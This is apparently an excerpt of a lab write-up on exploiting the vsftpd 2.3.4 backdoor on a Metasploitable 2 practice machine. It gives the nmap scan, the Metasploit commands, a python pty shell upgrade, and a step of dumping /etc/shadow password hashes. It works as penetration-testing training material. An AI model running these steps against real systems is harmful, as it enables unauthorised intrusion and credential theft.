Identifying and Exploiting Vulnerable Services

Exploiting linux-based systems: Fire up metasploitanle 2 linux Scan the target using nmap: nmap -A -p 21 172.30.1.134 Nmap was able to identify the service version of the FTP service as vsFTPd 2.3.4 Search in google vsftpd 2.3.4 exploit ![[Pasted image 20251020125219.png]] We are having an exploit module from rapid7 itself Open up msfconsole sudo msfconsole msf6 > use exploit/unix/ftp/vsftpd_234_backdoor msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set payload cmd/unix/ interact msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 172.30.1.20 msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit 6. Upgrading shell using command python -c 'import pty; pty.spawn("/bin/bash")' 7. Got a root shell on the target system , dumped the /etc/shadow file where the hashes of the user’s passwords stored. 8. Save the credentials into a text file, make sure edit the unecessary users from the output: ...

November 24, 2025 · 5 min · 979 words · 0x-s0M3n4th